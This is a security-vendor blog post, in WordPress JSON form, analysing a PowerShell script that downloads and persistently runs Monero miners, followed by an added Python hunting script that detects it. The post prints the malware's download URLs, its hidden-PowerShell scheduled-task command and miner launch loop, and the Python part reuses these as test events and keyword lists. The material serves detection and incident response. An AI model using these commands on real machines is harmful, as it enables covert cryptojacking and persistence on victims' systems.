{"id":2797,"date":"2024-09-25T20:00:25","date_gmt":"2024-09-25T20:00:25","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=2797"},"modified":"2025-07-29T06:39:41","modified_gmt":"2025-07-29T06:39:41","slug":"powershell-monero-miner-tunnelling-under-traditional-anti-virus","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/powershell-monero-miner-tunnelling-under-traditional-anti-virus\/","title":{"rendered":"Powershell Monero Miner tunnelling under traditional anti-virus"},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"477\" height=\"318\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/broken-eggs-1711144_960_720.webp\" alt=\"\" class=\"wp-image-2805\"\/><\/figure>\n<\/div>\n\n\n<p>Although the crypto-currency hype now seems to be dying down, the mid-2017 surge in the popularity of Monero (XMR) inspired attackers to develop malicious tools that mine the coin on other people\u2019s hardware.<\/p>\n\n\n\n<p>In fact, some of the mining malware released in the wild more than a year ago \u2013 when Monero\u2019s popularity really took off \u2013 is still being used successfully in attacks today.<\/p>\n\n\n\n<p>Late last month, LMNTRIX researchers discovered a PowerShell script that silently downloaded Monero miner programs designed to hijack the victim\u2019s CPU for mining.<\/p>\n\n\n\n<p>It was found during LMNTRIX Hunt activities in one of our client\u2019s networks. During Hunt engagements, our analysts methodically pursue and evict adversaries inside a network, all without relying on IOCs. 
As the malware had bypassed the client\u2019s traditional defences, analysts had to monitor suspicious activity in real time in order to isolate the malware\u2019s location before removing it.<\/p>\n\n\n\n<p>In this case, deploying the miner from a PowerShell script gave the attackers a level of persistence our analysts had not previously seen in the coin miner malware family: the script registers itself as a scheduled task that relaunches it every six minutes and keeps checking that the miner is running.<\/p>\n\n\n\n<p><strong>Sample details<\/strong><\/p>\n\n\n\n<p>File Hash (SHA-256): 3bf089f79e6f0fe0ad0f6ff6aab1d063e327f88894e21d4a8b424a10cb6806d1<\/p>\n\n\n\n<p>File Size: 1 KB<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"475\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/1-51-1024x475.webp\" alt=\"\" class=\"wp-image-2800\"\/><\/figure>\n\n\n\n<p><em>Figure 1. Current VT detection for this sample<\/em><\/p>\n\n\n\n<p>At the time of writing, only 10 out of 57 AV vendors listed in VirusTotal were detecting this sample as malicious, despite the fact that it had been in the wild for more than a year:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"456\" height=\"144\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/2-49.webp\" alt=\"\" class=\"wp-image-2801\"\/><\/figure>\n\n\n\n<p><em>Figure 2. Sample submission history<\/em><\/p>\n\n\n\n<p><strong>Sample code analysis<\/strong><\/p>\n\n\n\n<p>The script is short and to the point. 
First, it downloads two PE files that perform the actual Monero mining. Their locations are held in two variables:<\/p>\n\n\n\n<p>$url = \u201chxxps:\/\/x4ndj[.]github[.]io\/files\/minerd.exe\u201d<\/p>\n\n\n\n<p>$surl = \u201chxxps:\/\/x4ndj[.]github[.]io\/files\/OneDrive.exe\u201d<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"614\" height=\"149\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/3-48.webp\" alt=\"\" class=\"wp-image-2802\"\/><\/figure>\n\n\n\n<p><em>Figure 3. Miner files \u2013 download URLs<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"992\" height=\"373\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/4-49.webp\" alt=\"\" class=\"wp-image-2803\"\/><\/figure>\n\n\n\n<p><em>Figure 4. URL result \u2013 minerd.exe<\/em><br><br>As the figure shows, only two AV vendors flagged these URLs as malicious, despite the strain\u2019s first appearance more than a year ago. Note that the payloads are served from GitHub Pages (a github.io subdomain), so reputation-based URL filtering that trusts that domain may not block the download.<br><br><strong>Code structure and functionality<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"471\" src=\"https:\/\/lmntrix.com\/blog\/wp-content\/uploads\/2024\/09\/5-46-1024x471.webp\" alt=\"\" class=\"wp-image-2804\"\/><\/figure>\n\n\n\n<p><em>Figure 5. Malware\u2019s complete script cycle<\/em><br><br>\u25cf&nbsp;&nbsp; &nbsp;First, the script downloads the two miner executables into the TEMP directory under names chosen to blend in: <strong>OneDrive.exe<\/strong> and <strong>yam.exe<\/strong> (the latter is the downloaded minerd.exe).<br><br>\u25cf&nbsp;&nbsp; &nbsp;The script then copies itself to the user\u2019s home directory in order to maintain persistence. 
<strong>yam.exe<\/strong> is also copied to <strong>Tkinstaller.exe<\/strong> within the TEMP folder.<br><br>\u25cf&nbsp;&nbsp; &nbsp;A scheduled task is then created that relaunches the copied script from the user\u2019s home directory every six minutes (\/SC MINUTE \/MO 6), in a hidden PowerShell window with the execution policy bypassed (the script file appears as xxxx.ps1 in the listing):<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>SchTasks.exe \/Create \/SC MINUTE \/TN &#8220;User_Feed_Synchronization-{9A285FA7A2A0A-F17D-47B82-9343F9-A22AKFS2A0}&#8221; \/TR &#8220;PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File $HOME\\xxxx.ps1&#8221; \/MO 6 \/F<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>\u25cf&nbsp;&nbsp; &nbsp;Inside a loop, the script checks whether the miner is already running. If it is not, it launches both executables through cmd.exe and passes Tkinstaller.exe its pool connection string (the wallet is shown as <em>address<\/em>; the pool is xmr(.)crypto-pool(.)fr on port 443, mining XMR). The condition itself is not shown in this excerpt:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td>&nbsp; &nbsp; &nbsp; &nbsp; echo &#8220;Not running&#8221;<br>&nbsp; &nbsp; &nbsp; &nbsp; cmd.exe \/C $env:TMP\\OneDrive.exe<br>&nbsp; &nbsp; &nbsp; &nbsp; cmd.exe \/C $env:TMP\\Tkinstaller.exe -c x -M stratum+tcp:\/\/address:x@xmr(.)crypto-pool(.)fr:443\/xmr<br>&nbsp; &nbsp; } else {<br>&nbsp; &nbsp; &nbsp; &nbsp; echo &#8220;Running&#8221;<br>&nbsp; &nbsp; }<br>&nbsp; &nbsp; Start-Sleep 40<br>}<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>After each check the loop sleeps for 40 seconds and tries again, so a miner process that is killed is started again within about 40 seconds. The scheduled task starts the whole script again every six minutes (\/F overwrites the task if it already exists, so re-registration on each run does not fail), and -noexit keeps the PowerShell process alive after the script body has run. The whole process therefore repeats every time the scheduled task is triggered.<br><br><strong>Hunt Techniques<\/strong><br><br>Our dedicated Hunt team used several techniques to unearth the malware, as it had successfully bypassed the client\u2019s traditional defences. Although the sample evaded the anti-virus in place, LMNTRIX analysts were able to zero in on its location by monitoring the following unusual activities:<br><br>\u2022&nbsp;&nbsp; &nbsp;<strong>PowerShell Execution<\/strong> \u2013 Logging PowerShell commands is a fundamental tactic in the detection of anomalous command\/script execution. 
Enabling Script Block Logging locally or via GPO records the content of every script block PowerShell executes (Event ID 4104 in the Microsoft-Windows-PowerShell\/Operational log), so the download URLs, the schtasks command and the pool string in this sample would all have been written to the event log even though the script lived on disk as a 1 KB file. In malware, PowerShell is typically used as a way to evade detection and maintain persistence, catalogued in the <a href=\"https:\/\/attack.mitre.org\/wiki\/Technique\/T1086\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;CK Matrix<\/a> as T1086 (PowerShell), since folded into T1059.001, Command and Scripting Interpreter: PowerShell.<br><br>\u2022&nbsp;&nbsp; &nbsp;<strong>\u201cschtasks.exe\u201d Execution<\/strong> \u2013 By hunting for suspicious scheduled tasks, incident responders identified the task the script had registered. schtasks.exe creates, modifies and runs scheduled tasks on a local or remote computer, and attackers give their tasks plausible names: here the name copies the pattern of Windows\u2019 own User_Feed_Synchronization-{GUID} task, and the miner it ultimately launches is called OneDrive.exe. The disguise does not survive inspection. The bracketed identifier is not a well-formed GUID (its groups have the wrong lengths and contain the non-hexadecimal characters K and S), and the task\u2019s action is a hidden PowerShell session with the execution policy bypassed rather than anything the feed service or OneDrive would register. Once those details were compared with what a legitimate task would show, it was clear a malicious task was being scheduled.<br><br>\u2022&nbsp;&nbsp; &nbsp;<strong>Suspicious Run Locations<\/strong> \u2013 Attackers often place their malicious binaries in unusual locations such as RECYCLER, System Volume Information, %TEMP%, %APPDATA%, %LOCALAPPDATA% and %USERPROFILE%. Analysts monitored such uncommon directories and were able to confirm the malware\u2019s location. The same result can be achieved preventively by allow-listing the directories from which authorised binaries may execute, for example with AppLocker path rules. In this case, the malware was executing from %TEMP% \u2013 an immediate red flag.<br><br>\u2022&nbsp;&nbsp; &nbsp;<strong>Processes Spawning cmd.exe<\/strong> \u2013 Parent processes that spawn command prompts may be suspicious based on the number of occurrences, the name of the parent process, or the execution directory. Generally, cmd.exe is legitimately invoked by explorer.exe, logon scripts, administrative tools, and automated programs. 
In this case the script used cmd.exe \/C to start the miners, so analysts saw powershell.exe as the parent of cmd.exe, which in turn launched binaries from %TEMP% \u2013 another red flag.<br><br><strong>Indicators of Compromise<\/strong><br><br>\u2022&nbsp;&nbsp; &nbsp;<strong>SHA-256 (PowerShell script):<\/strong> 3bf089f79e6f0fe0ad0f6ff6aab1d063e327f88894e21d4a8b424a10cb6806d1<br><br>\u2022&nbsp;&nbsp; &nbsp;<strong>URL:<\/strong> hxxps:\/\/x4ndj[.]github[.]io\/files\/minerd.exe<br><br>\u2022&nbsp;&nbsp; &nbsp;<strong>URL:<\/strong> hxxps:\/\/x4ndj[.]github[.]io\/files\/OneDrive.exe<br><br>\u2022&nbsp;&nbsp; &nbsp;<strong>Mining pool:<\/strong> stratum+tcp:\/\/xmr(.)crypto-pool(.)fr:443<br><br>\u2022&nbsp;&nbsp; &nbsp;<strong>Dropped files:<\/strong> %TEMP%\\OneDrive.exe, %TEMP%\\yam.exe, %TEMP%\\Tkinstaller.exe, and a copy of the script in the user\u2019s home directory<br><br>\u2022&nbsp;&nbsp; &nbsp;<strong>Scheduled task:<\/strong> User_Feed_Synchronization-{9A285FA7A2A0A-F17D-47B82-9343F9-A22AKFS2A0}<br><br><strong>Conclusion<\/strong><br><br>PowerShell scripts are mostly used by system administrators to automate tasks such as downloading files and creating scheduled tasks, and this script is little more than those administrative commands chained together. That is the primary reason most vendors on VirusTotal did not identify it as malicious. It is recommended to have a Threat Hunting dashboard ready with analytics for known TTPs (as shown in the \u2018Hunt Techniques\u2019 section) in order to identify the threats that fly below the traditional AV radar.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Although the crypto-currency hype now seems to be dying down, the emergence of a popular new currency in mid-2017 inspired hackers to develop malicious tools to harvest the new coin &ndash; Monero (XMR). 
In fact, some of the mining malware released in the wild more than a year ago &ndash; when Monero&rsquo;s popularity really took [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2805,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-2797","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2797","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/comments?post=2797"}],"version-history":[{"count":5,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2797\/revisions"}],"predecessor-version":[{"id":4313,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2797\/revisions\/4313"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media\/2805"}],"wp:attachment":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media?parent=2797"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/categories?post=2797"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/tags?post=2797"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
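The four hunt techniques from the post (PowerShell execution, schtasks.exe creation, suspicious run locations, and PowerShell spawning cmd.exe) expressed as one detection routine. This is an added example, not the LMNTRIX team's code. The event records are constructed to resemble Sysmon process-creation and PowerShell script-block (Event ID 4104) data; the field names, the user name, the paths, the benign control events and the DownloadFile call in the script-block sample are assumptions. The scheduled-task check goes slightly beyond the post by validating the GUID in any User_Feed_Synchronization-{...} task name, which is exactly what separates the sample's task from Windows' own.

```python
"""Hunt analytics for the PowerShell miner, run over constructed Sysmon/PowerShell events.

Added example, not LMNTRIX tooling. Field names, user name, paths, the benign control
events and the DownloadFile call in the script-block sample are assumptions.
"""
import re
from typing import Dict, Iterable, List, Tuple

# Run locations from which legitimate software rarely executes (compared in lower case).
SUSPICIOUS_DIRS = (
    "\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\appdata\\local\\",
    "\\recycler\\", "\\$recycle.bin\\", "\\system volume information\\",
)
# PowerShell switches that hide the session or disable the execution policy.
PS_SUSPICIOUS_FLAGS = ("-executionpolicy bypass", "-windowstyle hidden", "-encodedcommand")
# Script-block content matching the dropper: download, write to %TEMP%, task creation, pool.
SCRIPT_INDICATORS = ("downloadfile(", "$env:tmp", "schtasks", "stratum+tcp://")
# Windows' own feed-sync task is named User_Feed_Synchronization-{GUID} with a real GUID.
FEED_TASK_PREFIX = "User_Feed_Synchronization-"
GUID_RE = re.compile(r"^\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")
TASK_NAME_RE = re.compile(r'/TN\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
# A .ps1 sitting directly in a user's profile root, as $HOME\xxxx.ps1 does in the sample.
PROFILE_ROOT_PS1_RE = re.compile(r'-file\s+"?([a-z]:\\users\\[^\\]+\\[^\\"]+\.ps1)', re.IGNORECASE)

Finding = Tuple[str, str]


def task_name_is_impersonation(task_name: str) -> bool:
    """True when a task borrows the Windows feed-sync name but its GUID is malformed."""
    if not task_name.startswith(FEED_TASK_PREFIX):
        return False
    return GUID_RE.match(task_name[len(FEED_TASK_PREFIX):]) is None


def hunt(events: Iterable[Dict[str, str]]) -> List[Finding]:
    """Apply the four hunt techniques and return (technique, evidence) pairs."""
    findings: List[Finding] = []
    for ev in events:
        if ev["kind"] == "scriptblock":  # PowerShell execution: script block logging (4104)
            hits = [i for i in SCRIPT_INDICATORS if i in ev["script_text"].lower()]
            if hits:
                findings.append(("powershell_scriptblock", ",".join(hits)))
            continue
        image, parent = ev["image"].lower(), ev["parent_image"].lower()
        cmd, lcmd = ev["command_line"], ev["command_line"].lower()
        # Suspicious run locations: the miner binaries live under %TEMP%.
        if any(d in image for d in SUSPICIOUS_DIRS):
            findings.append(("suspicious_run_location", ev["image"]))
        # PowerShell execution: hidden/bypass switches, and a script dropped in the profile root.
        if image.endswith("\\powershell.exe"):
            if any(f in lcmd for f in PS_SUSPICIOUS_FLAGS):
                findings.append(("powershell_suspicious_flags", cmd))
            m = PROFILE_ROOT_PS1_RE.search(cmd)
            if m:
                findings.append(("script_in_profile_root", m.group(1)))
        # schtasks.exe execution: impersonating task name or a hidden PowerShell action.
        if image.endswith("\\schtasks.exe") and "/create" in lcmd:
            m = TASK_NAME_RE.search(cmd)
            name = (m.group(1) or m.group(2) or "") if m else ""
            if task_name_is_impersonation(name):
                findings.append(("schtasks_malformed_guid", name))
            if "powershell" in lcmd and any(f in lcmd for f in PS_SUSPICIOUS_FLAGS):
                findings.append(("schtasks_hidden_powershell_action", cmd))
        # Processes spawning cmd.exe: powershell.exe as the parent is the sample's pattern.
        if image.endswith("\\cmd.exe") and parent.endswith("\\powershell.exe"):
            findings.append(("powershell_spawned_cmd", cmd))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SYS32 = r"C:\Windows\System32"
# Constructed events (not real telemetry) mirroring the post's script cycle, plus benign controls.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"kind": "process", "image": PS, "parent_image": SYS32 + r"\svchost.exe",
     "command_line": r"PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File C:\Users\alice\xxxx.ps1"},
    {"kind": "process", "image": SYS32 + r"\schtasks.exe", "parent_image": PS,
     "command_line": r'SchTasks.exe /Create /SC MINUTE /TN "User_Feed_Synchronization-{9A285FA7A2A0A-F17D-47B82-9343F9-A22AKFS2A0}" '
                     r'/TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File C:\Users\alice\xxxx.ps1" /MO 6 /F'},
    {"kind": "process", "image": SYS32 + r"\cmd.exe", "parent_image": PS,
     "command_line": r"cmd.exe /C C:\Users\alice\AppData\Local\Temp\OneDrive.exe"},
    {"kind": "process", "image": r"C:\Users\alice\AppData\Local\Temp\Tkinstaller.exe", "parent_image": SYS32 + r"\cmd.exe",
     "command_line": r"C:\Users\alice\AppData\Local\Temp\Tkinstaller.exe -c x -M stratum+tcp://address:x@xmr.crypto-pool.fr:443/xmr"},
    {"kind": "scriptblock",
     "script_text": "$url = 'hxxps://x4ndj[.]github[.]io/files/minerd.exe'\n"
                    "(New-Object Net.WebClient).DownloadFile($url, \"$env:TMP\\yam.exe\")"},
    # Benign controls: Windows' real feed-sync task name with a valid GUID, and Explorer starting cmd.
    {"kind": "process", "image": SYS32 + r"\schtasks.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'schtasks.exe /Create /SC DAILY /TN "User_Feed_Synchronization-{3E5A1F9C-8B2D-4C6E-9F01-2A3B4C5D6E7F}" '
                     r'/TR "C:\Windows\System32\msfeedssync.exe sync" /F'},
    {"kind": "process", "image": SYS32 + r"\cmd.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"cmd.exe /K C:\Users\alice\Documents\build.cmd"},
]

if __name__ == "__main__":
    for technique, evidence in hunt(SAMPLE_EVENTS):
        print(f"{technique:36} {evidence}")
```

Run against the sample set, the five malicious events produce seven findings and the two benign controls produce none; the feed-sync task with a well-formed GUID passes the name check, which is the point of validating the GUID rather than matching on the prefix alone. In a real deployment the same functions would be fed from Sysmon Event ID 1 and PowerShell Event ID 4104 records rather than the embedded list.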